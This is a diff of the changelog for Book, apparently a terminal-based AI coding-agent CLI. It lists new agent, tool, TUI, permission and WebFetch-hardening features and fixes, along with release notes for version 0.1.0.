+ - Unified `/jobs` TUI management for managed agents and background shell jobs, with `/tasks` kept
2260
+ as an alias. Background shells support session or explicit persistent lifetimes, bounded output,
2261
+ optional parent-agent completion delivery, restart reattachment, stop/dismiss controls, and SDK/
2262
+ stream-json lifecycle events. Finished and stopped shell rows leave the active UI automatically
2263
+ while a one-time completion notice remains available.
2264
+
2265
+ - Streaming assistant responses now use the same Markdown layout as completed replies while
2266
+ keeping a bounded, throttled live tail for responsive rendering of large outputs.
2267
+
2268
+ - `/config` now opens a visual settings menu for model, effort, theme, memory capture, and
2269
+ subagent profile models. Explorer, patcher, validator, and custom profiles can select an
2270
+ existing configured model or reset to parent-model inheritance without editing JSON.
2271
+
2272
+ - `AskUserQuestion` now explicitly advertises single- and multi-select questions to models.
2273
+
2274
+ - Added terminal-screen regression coverage and made patched Ink incremental rendering the default
2275
+ interactive mode through `BOOK_TUI_RENDERER`. The stable full-frame renderer remains available
2276
+ as `BOOK_TUI_RENDERER=safe`, while active TUI animations share pausable clocks to reduce render
2277
+ churn.
2278
+
2279
+ - Persistent tool-use telemetry and a `book tool-stats` subcommand for measuring tool use across
2280
+ sessions. Each finalized tool call appends one JSON line to `~/.book/telemetry/tool-use.jsonl`
2281
+ (best-effort, off the hot path, size-rotated; captured at the final-status point so plan/user
2282
+ mutations are reflected), recording the tool, status, a derived `isFailure` flag (only `error`/
2283
+ `timed_out` — blocks/cancellations never count), error code, duration, retries, model, and
2284
+ subagent attribution. `book tool-stats` reports per-tool calls/fail rate/p50/p95/retry rate, a
2285
+ per-model split, and top error codes (`--json`, `--since <days>`, `--all`, `--prune`). Gated by
2286
+ `observability.toolTelemetry` (default on) with `observability.toolTelemetryRetentionDays` as the
2287
+ reporting/prune window. Separate from the ephemeral in-session counters in `/usage`.
2288
+
2289
+ - Fresh-context plan handoff: an "Approve, fresh context" option (shortcut `F`) at the plan-approval
2290
+ prompt stops the planning turn and starts a new conversation seeded with only the approved plan —
2291
+ the implementation runs with a clean context window, like Codex/Claude Code handoff.
2292
+ - Model-conditional mutation guidance: the system prompt recommends `ApplyPatch` to GPT/Codex-family
2293
+ models (known picker models resolve by provider metadata) and exact-replace `Edit`/`MultiEdit` to
2294
+ everything else, with a per-model `editFormat` (`patch` | `replace` | `whole`) settings override
2295
+ under `provider.<name>.models.<id>`. In plan mode the guidance instead directs the model to
2296
+ explore read-only and call `ExitPlanMode`.
2297
+ - Cross-harness tool-argument aliases, declared on each tool definition: Claude Code-style
2298
+ spellings (`file_path`, `old_string`, `new_string`, `replace_all`, nested MultiEdit `edits[]`
2299
+ keys, Grep `glob`/`-A`/`-B`/`-C`, ApplyPatch `input`) normalize to canonical arguments before
2300
+ hook and permission evaluation — aliased spellings cannot bypass path-scoped permission rules —
2301
+ and `invalid_arguments` errors list the allowed argument names.
2302
+ - Grep `path` (directory or file scope) and `C` (symmetric context) parameters on both the native
2303
+ `rg` and portable backends; scoped portable searches still honor root-anchored `.gitignore`
2304
+ patterns.
2305
+ - Whitespace-tolerant Edit/MultiEdit recovery: trailing-whitespace and uniform-indent-shift
2306
+ relaxations apply only on a unique match, re-indent the replacement (rejecting matches whose
2307
+ replacement cannot shift consistently), annotate the result, never apply to `replaceAll`, and
2308
+ yield to the event loop with abort support on large files.
2309
+ - An advisory identical-retry circuit breaker that appends escalated guidance to the tool's own
2310
+ remediation when a call repeats with the same arguments and error (retryable transient failures
2311
+ exempt), plus structured remediation now rendered into model-facing error text as `Fix:` lines —
2312
+ preserved even when oversized errors are clipped.
2313
+ - Per-session tool call/failure counters surfaced in `/usage` (text report and TUI card, with
2314
+ totals and failing tools listed first). Only real errors and timeouts count as failures; user
2315
+ denials, plan-mode blocks, and cancellations do not.
2316
+ - `npm run eval:edit` — a deterministic edit-reliability eval (~25 fixture tasks) run against the
2317
+ configured model via the SDK, reporting per-task results to `.book/reports/`.
2318
+ - Bounded, session-wide concurrent execution for explicitly reviewed read-only file and Git tools,
2319
+ with ordered serial barriers, all-settled sibling results, duplicate-call rejection, and shared
2320
+ root/managed-child scheduling.
2321
+ - Codex-style `AGENTS.md` project-instruction discovery alongside the existing Claude-style
2322
+ `CLAUDE.md` and `.claude/rules` loader.
2323
+ - Resilient managed-agent persistence with fsynced atomic writes, bounded Windows contention
2324
+ retries, per-target locks, process leases, orphan-temp recovery, background coalescing, typed
2325
+ retryable tool failures, and non-modal degraded/recovered storage events.
2326
+ - A clear 30-day local retention policy for expired sessions and rotated debug logs; the active
2327
+ session and current debug log are always preserved.
2328
+ - Canonical `ApplyPatch` file mutation with exact contextual hunks, LF/CRLF and BOM preservation,
2329
+ multi-file staging, atomic verification, rollback, per-file artifacts, legacy permission/hook
2330
+ compatibility, and the `apply_patch` provider alias.
2331
+ - Native `rg` streaming for `Grep`, bounded `WebFetch`/`WebSearch` responses, rotating debug logs, terminal-shell TTL/cap cleanup, and the explicit `DismissShell` action.
2332
+ - Claude Code-style queued follow-up input: Enter queues while a turn is running, Up recalls the newest queued message, Enter resubmits edits, and Esc cancels queue editing without interrupting the active turn.
2333
+ - Repeatable `bench:runtime` coverage for snapshots, sessions, search, Grep, context construction, streaming updates, and retained resources.
2334
+ - Managed-agent hardening with an outstanding spawn cap, paginated `AgentRead` result recovery, context-budgeted and idempotent completion delivery, bounded retries, per-record version-3 persistence, managed Git artifact cleanup, and per-run telemetry generations.
2335
+ - Claude-style managed-agent contracts: purpose-named runs distinct from reusable profiles, durable automatic parent completion delivery, semantic lifecycle rows, a prompt-adjacent `/tasks` panel, resumable child transcripts, version-2 state migration, profile model resolution, compact lifecycle projections, advisory three-query Explore routing, actionable permission errors, multi-host runtime events, read-only non-Git Explore, and explicit third-party agent import previews.
2336
+ - Claude-style inline managed-agent activity blocks: live child tool calls in the main transcript, compact `+N tool uses` overflow, bounded realtime result previews, and full-history child detail navigation.
2337
+ - Provider-neutral `ToolSearch` with adaptive eager/deferred exposure, fuzzy catalog metadata, next-turn activation, MCP namespace discovery, and session-scoped LRU retention.
2338
+ - A breaking ToolResult V2 contract for provider content, machine-readable data, actionable errors, metrics, artifacts, pagination, and TUI presentation. Persisted pre-V2 session results are upgraded while loading.
2339
+ - Adaptive managed agents with built-in explorer/patcher/validator profiles, three-worker scheduling, resumable persisted transcripts, background lifecycle controls, and TUI/SDK/headless interfaces.
2340
+ - Synthetic Git snapshots and per-agent worktrees that preserve dirty parent state, automatically commit patcher deltas, and atomically reject drift or conflicts.
2341
+ - Typed evidence publishing and independent validator verdicts; `AgentApply` accepts only the exact candidate commit linked to a pass verdict.
2342
+ - Named `Check` commands from `agents.checks` or standard package scripts, plus local paired evaluation metrics for `--agents off` versus `--agents adaptive`.
2343
+ - Structured `AskUserQuestion` clarification flow with a step-by-step TUI wizard, free-text answers, SDK callbacks, stream-json observability, and root/subagent source attribution.
2344
+ - Claude Code-style `/effort` command with direct level selection, a dedicated keyboard picker, model capability restrictions, and project-local default persistence.
2345
+ - Reference-aware compact checkpoints retain a token-budgeted exact recent tail, grounded historical constraints, task episodes, and freshness-checked file observations.
2346
+ - Bounded `SessionHistorySearch` / `SessionHistoryRead` tools recover compacted-away evidence through stable current-session references.
2347
+ - Claude-style `/rewind` with a two-stage prompt/action picker, append-only conversation branching, content-addressed workspace checkpoints, Git HEAD drift protection, transactional rollback, and temporary storage under `--no-session-persistence`.
2348
+
2349
+ ### Changed
2350
+
2351
+ - Detailed tool rows now keep raw call parameter lists out of both visual and screen-reader
2352
+ transcripts while retaining concise summaries and result output.
2353
+ - Documentation now reflects the current proprietary/source-distributed package status, shipped
2354
+ CLI and runtime surfaces, open security boundaries, and implementation status of historical
2355
+ roadmap documents.
2356
+ - `WebFetch` now returns structured provenance and Markdown/text/sanitized-HTML formats, uses a
2357
+ real HTML parser, preserves bounded complete output through the shared tool-output path, rejects
2358
+ binary content, and treats its legacy `prompt` argument as metadata instead of claiming to
2359
+ perform extraction. `WebSearch` now works without configuration through a built-in Exa MCP
2360
+ provider with a fixed endpoint, bounded responses, and result/domain/recency/country controls.
2361
+ - Web tools are explicitly parallel-safe but remain permission-gated network operations, including
2362
+ in plan mode. Remembered fetch approval is scoped to the URL origin; cross-origin redirects must
2363
+ be fetched as a separately approved call.
2364
+ - Improved TUI streaming responsiveness by batching first-turn updates at a sustainable cadence,
2365
+ avoiding idle accumulator wakeups, and limiting the active transcript window to the available
2366
+ terminal height while output is streaming. Live Markdown now uses a bounded plain-text tail and
2367
+ defers full decoration until completion.
2368
+ - Smoothed mouse-wheel history navigation with three-row wheel steps, low-latency event-loop
2369
+ coalescing, isolated transcript content, and support for coalesced terminal reports.
2370
+ - Reduced managed-agent render fan-out, bounded completed transcript hydration with keyboard/mouse
2371
+ history expansion, accelerated terminal-width measurement, and batched noisy render diagnostics.
2372
+
2373
+ - BYOK providers and the active model selection now persist to the user-global `~/.book/settings.json`
2374
+ instead of the per-project `.book/settings.local.json`, so a provider added in one folder (its
2375
+ credentials, model catalog, and default model) is shared across every project rather than
2376
+ re-entered per folder. Provider removal (`Alt+D` in `/model` / `/providers`) targets the global
2377
+ file, and removable rows are labeled `[BYOK]` (previously `[local BYOK]`). Saving a model or
2378
+ provider also clears any stale same-key override from the current folder's
2379
+ `.book/settings.local.json` (which would otherwise shadow the new global value), so an
2380
+ already-used folder picks up the global choice immediately. Existing per-project provider entries
2381
+ are still read via the layered resolver but are no longer managed from the picker.
2382
+ - **Breaking:** `Edit`/`MultiEdit`/`NotebookEdit` — and `Write` over an existing file — now require
2383
+ the file to have been Read or `@`-mentioned in the session first (`file_not_observed`);
2384
+ previously only staleness after an observation was checked. `ApplyPatch` is exempt (context
2385
+ hunks self-anchor), contexts without an observation ledger are unaffected, observation keys are
2386
+ case-folded on Windows, and child agents inherit a copy of the parent's observations.
2387
+ - `ApplyPatch` is no longer described as the universally preferred mutation tool; the preference is
2388
+ model-conditional (see Added) and tool descriptions are neutral.
2389
+ - Tool concurrency is now an explicit policy rather than an idempotence side effect; preparation,
2390
+ hooks, permission prompts, interactive tools, mutations, shell commands, and lifecycle actions
2391
+ remain serial by default.
2392
+ - Strengthened the stable agent system prompt with end-to-end persistence, evidence-first tool
2393
+ use, failed-call recovery, tighter scope control, behavior-level verification, final diff review,
2394
+ and explicit authorization scope.
2395
+ - Session discovery now uses an atomic metadata index with linear JSONL replay and shared search/read indexes; rewind snapshots cache unchanged files, deduplicate manifest entry sets, and exclude workspace-local `.book/` state by default.
2396
+ - Static prompt discovery, tool schema estimates, Git context, and streaming transcript projection are cached or incrementally updated, with adaptive flushing and a bounded streaming transcript window.
2397
+ - Legacy permission migration runs during explicit startup, records a migration marker, skips identical settings writes, and serializes cross-process settings mutations.
2398
+ - Replaced the separate Agent Center and profile tab with Claude Code's in-session task workflow: a flat `main`-plus-children panel below the prompt, empty-prompt Tab to cycle focus straight into each child's transcript (wrapping back to `main`), `/tasks` for explicit management, `x` to stop or dismiss, and Esc to return.
2399
+ - New sessions receive a short title from their first prompt, and the TUI shows session names instead of internal UUIDs.
2400
+ - Provider visibility, system-prompt tool summaries, command/skill capabilities, role restrictions, permission modes, runtime availability, and execution now share one resolved tool surface.
2401
+ - Tool schemas are closed and centrally validated; model-visible sandbox bypass, backend selection, and generic timeout controls moved back to host configuration.
2402
+ - Managed agents are enabled by default in adaptive mode; use `--agents manual` for explicit-only delegation or `--agents off` for the single-agent baseline.
2403
+ - Agent definition tool lists are now strict capabilities: missing/empty denies all tools, `*` explicitly inherits, argument globs are enforced at execution, and user-question/MCP/lifecycle tools are never injected implicitly.
2404
+ - Redesigned the interactive TUI with matched quiet-editorial dark/light themes, a compact BOOK bookplate, inset user cards, open assistant typography, tree-style tool activity, a floating rounded composer, and softer picker/approval surfaces.
2405
+ - Compaction now replaces only active model context. The append-only transcript and chronological compact boundaries remain visible, scrollable, and resumable.
2406
+ - `/context` reports visible transcript size separately from active provider context.
2407
+
2408
+ ### Security
2409
+
2410
+ - Hardened `WebFetch` against SSRF and DNS rebinding by requiring HTTPS unless explicitly enabled,
2411
+ rejecting embedded credentials and local/private/special-use destinations, validating every DNS
2412
+ result again at connection time, manually bounding redirects, and refusing cross-origin redirect
2413
+ hops. Dangerous HTTP/private-network exceptions require explicit host environment opt-in.
2414
+ - Managed snapshots include non-ignored untracked files in the local Git object database by default. Ignore secrets or set `agents.includeUntrackedInSnapshot` to `false` before delegation.
2415
+ - Rewind snapshots intentionally include hidden, gitignored, and secret-like workspace files for complete local restoration, but keep file contents out of session JSON, logs, and model context; `.git` and workspace-local `.book/` state are excluded by default.
2416
+
2417
+ ### Fixed
2418
+
2419
+ - Show a lightweight placeholder (or the live stream) instead of the main welcome screen when opening a child transcript that has not produced output yet.
2420
+ - Queue concurrent permission requests instead of superseding earlier prompts, propagate
2421
+ cancellation into foreground shell processes, and give aborted tools a bounded cooperative
2422
+ teardown window before releasing their execution slot.
2423
+ - Use a 64,000-token output fallback for models without published output metadata instead of consuming the entire fallback context window.
2424
+ - Prevent context-window failures from oversized tool output by skipping binary `Grep` inputs, bounding search and generic tool results, preflighting complete provider requests, and compacting or clipping once before retrying recognized overflow errors.
2425
+ - Apply interactive permission-mode changes immediately to the active agent loop.
2426
+ - Keep mouse-wheel transcript scrolling while allowing terminal copy with Shift+drag.
2427
+ - Reconcile transcript height after descendant-local updates so throttled Markdown remains reachable
2428
+ without restoring per-wheel full-content measurement.
2429
+ - Deliver completed and failed subagent reports to the parent before automatically removing their terminal rows from the prompt-adjacent task panel.
2430
+ - Prevent the first submitted TUI message from freezing during a cold rewind snapshot by yielding filesystem checkpoint work and rendering the optimistic turn first.
2431
+ - Make `/theme` open a keyboard picker, apply the full app palette, persist the selection, resolve terminal auto mode correctly, and report invalid custom themes.
2432
+ - Keep local slash-command output visible and resumable in the TUI without adding it to provider or compaction context.
2433
+ - Add breathing room between transcript actions, keep general completed output collapsed, and show complete file-mutation diffs under Codex-style grouped file summaries with per-file collapse controls.
2434
+
2435
+ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
2436
+ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
2437
+
2438
+ ## [0.1.0] - 2026-07-14
2439
+
2440
+ First public-ready release of Book, a provider-agnostic AI coding agent CLI with a Claude Code-style terminal UI.
2441
+
2442
+ ### Added
2443
+
2444
+ #### Core agent
2445
+
2446
+ - Agent loop with multi-turn tool use, mid-stream abort (`Esc`), and context compaction (`/compact`)
2447
+ - Anthropic Messages API provider (SSE streaming, prompt caching, adaptive thinking, `--effort`)
2448
+ - OpenAI-compatible provider with auto-detect from `baseUrl`, retries, and usage tracking
2449
+ - BYOK provider setup and model filtering in the TUI
2450
+ - Two-zone system prompt (cacheable static prefix + dynamic per-turn suffix)
2451
+ - Session persistence (JSONL) with `--resume`, `--continue`, `--session-id`, `--fork-session`
2452
+ - Headless/print mode (`-p`) with `text` / `json` / `stream-json` output
2453
+ - Structured output via `--json-schema`
2454
+ - Optional stream-json enrichments: hook events, partial messages, prompt suggestions
2455
+
2456
+ #### Tools
2457
+
2458
+ - File tools: `Read`, `Write`, `Edit`, `MultiEdit`, `Glob`, `Grep`, `NotebookEdit`
2459
+ - Shell: `Bash` with `run_in_background`, `BashOutput`, `KillShell`
2460
+ - Git tools and unified diff rendering
2461
+ - Web: `WebFetch`, `WebSearch`
2462
+ - Task tools: `TaskCreate`, `TaskList`, `TaskGet`, `TaskUpdate`, `TaskStop`
2463
+ - Plan mode: `EnterPlanMode`, `ExitPlanMode` with host approval gate
2464
+ - Skills (`InvokeSkill`) and subagent `Task` delegation
2465
+ - MCP client (stdio transport)
2466
+
2467
+ #### Project context & memory
2468
+
2469
+ - CLAUDE.md / rules tree walk (user → project → local → `.claude/rules`)
2470
+ - Auto-memory store under `~/.book/projects/<project>/memory/` with approval inbox
2471
+ - Secret detection before memory writes
2472
+ - Skills, slash commands, and subagents discovered from `.book/`
2473
+
2474
+ #### TUI
2475
+
2476
+ - Ink/React interactive UI with welcome banner and status line
2477
+ - Markdown rendering (tables, code, syntax highlighting)
2478
+ - Transparent tool-call display; collapse long tool output; Claude-style edit summaries
2479
+ - `@file` mentions with fuzzy autocomplete (Tab / Enter)
2480
+ - Slash-command palette with fuzzy search and categories
2481
+ - Permission prompts with six modes and persistent allow/deny rules
2482
+ - Responsive layout, Static message handoff, scrollback stability work
2483
+ - Model picker and BYOK provider setup flow
2484
+ - Debug instrumentation via `BOOK_DEBUG*` flags
2485
+
2486
+ #### CLI & config
2487
+
2488
+ - Layered settings: `~/.book/settings.json` → `.book/settings.json` → `.book/settings.local.json` → `--settings`
2489
+ - `book doctor` and `book config` subcommands
2490
+ - Built-in slash commands including `/help`, `/model`, `/config`, `/permissions`, `/memory`, `/cost`, `/usage`, `/context`, `/diff`, `/export`, `/skills`, `/review`, `/security-review`, `/release-notes`, `/feedback`, `/init`
2491
+ - Permission modes: default, acceptEdits, plan, auto, dontAsk, bypassPermissions
2492
+ - Optional bubblewrap sandbox and lifecycle hooks (JSON-over-stdio)
2493
+
2494
+ #### SDK
2495
+
2496
+ - Programmatic `query()` generator export for embedding Book in other tools
2497
+
2498
+ ### Notes
2499
+
2500
+ - npm package name `book` is already taken on the public registry; this release is distributed via GitHub only.
2501
+ - One ConPTY-based TUI integration test can flake under full parallel load on Windows; it passes in isolation.
2502
+ - See [`MILESTONES.md`](./MILESTONES.md) for remaining Phase 1 parity work (LSP, more CLI flags, vim mode, etc.).
2503
+
2504
+ [0.1.0]: https://github.com/letrquan/book/releases/tag/v0.1.0